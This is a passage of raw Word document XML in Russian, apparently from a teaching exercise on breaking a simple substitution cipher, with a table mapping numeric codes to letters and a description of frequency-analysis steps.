        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:right="940" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Второй шаг дешифровки – установление соответствия кодов буквам русского алфавита.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2250" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="860"/>
        <w:gridCol w:w="1840"/>
        <w:gridCol w:w="840"/>
        <w:gridCol w:w="1620"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="200" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Шифр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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200" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Дешифровка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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200" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Шифр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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200" w:lineRule="exact"/>
              <w:ind w:left="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Дешифровка</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="201"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="201" w:lineRule="exact"/>
              <w:ind w:left="120"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="184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пробел, знак</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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Ы</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="25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препинания</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30</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О</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25</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Ь</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18</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Е</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15</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Г</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32</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А</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12</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З</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16</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И</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Б</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4</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Н</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22</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Ч</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14</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Т</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31</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Й</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24</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С</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Х</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23</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Р</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7</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Ж</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10</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В</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3</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Ш</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11</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Л</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27</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Ю</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13</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К</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5</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Ц</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6</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М</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19</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Щ</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20</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Д</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29</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Э</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21</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П</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34</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Ф</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28</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У</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9</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Ъ</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33</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Я</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17</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Ё</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="207" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Третий шаг дешифровки – количественный анализ структуры шифрованного сообщения, выдвижение гипотезы относительно отклонения корреляции кодов шифрованного сообщения и букв русского алфавита в соответствии с языковыми особенностями (например, чередование гласных и согласных букв) и корректировка установленной корреляции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="21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60"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="380"/>
        <w:gridCol w:w="200"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="20"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="340"/>
        <w:gridCol w:w="240"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="420"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="420"/>
        <w:gridCol w:w="360"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="400"/>
        <w:gridCol w:w="120"/>
        <w:gridCol w:w="120"/>
        <w:gridCol w:w="60"/>
        <w:gridCol w:w="40"/>
      </w:tblGrid>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С</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color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>Е</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>25</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>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Д</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Н</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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="6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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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33</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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36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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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40" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="228"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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С</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="8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22</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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="82"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="82"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>С</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Т</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="4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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="4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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="6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В</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="6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О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="4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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>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О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>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FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="righ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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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00" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>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60" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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228" w:lineRule="exact"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="74"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="74"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>В</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13</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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>8</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40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20</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Ы</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15</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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60" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>15</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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="100"/>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36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520" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeas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Е Е</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8</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29</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21</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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>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360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>18</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="180"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="magenta"/>
              </w:rPr>
              <w:t>33</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ind w:left="10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520" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF00FF"/>
